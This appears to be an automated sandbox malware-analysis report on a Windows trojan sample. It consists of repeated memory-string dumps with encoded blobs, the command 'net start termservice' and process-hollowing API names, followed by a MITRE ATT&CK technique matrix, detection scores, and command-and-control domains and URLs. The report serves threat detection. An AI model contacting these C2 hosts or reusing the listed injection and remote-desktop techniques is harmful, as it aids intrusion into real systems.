7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: explorer.exe, 0000000F.00000002.1787969074.0000000000220000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000F.00000002.1787969074.0000000000220000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: cckrnaa.10.dr	String found in binary or memory: net start termservice
Source: cckrnaa.10.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: pbxllkvlhugf.8.dr	String found in binary or memory: net start termservice
Source: pbxllkvlhugf.8.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: djivmxg.2.dr	String found in binary or memory: net start termservice
Source: djivmxg.2.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	2 Scheduled Task/Job	512 Process Injection	21 Masquerading	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Screen Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Scheduled Task/Job	11 DLL Side-Loading	2 Scheduled Task/Job	21 Virtualization/Sandbox Evasion	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	512 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	144 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	13%	ReversingLabs	Win32.Trojan.GiantMidie

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\cckrnaa	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\pbxllkvlhugf	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\djivmxg	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://www.symauth.com/cps0(	0%	URL Reputation	safe
http://www.symauth.com/rpa00	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
moviecentral-petparade.com	172.67.213.173	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
moviecentral-petparade2.com	unknown	unknown	false	unknown
moviecentral-petparade3.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://moviecentral-petparade.com/g9jvjfd73/index.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpp	explorer.exe, 0000000C.00000003.2173311069.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156574293.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpc$v	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phps$f	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.vmware.com/0	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclMath.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/bzip2.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStringConver	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php8E	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php/index.php	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
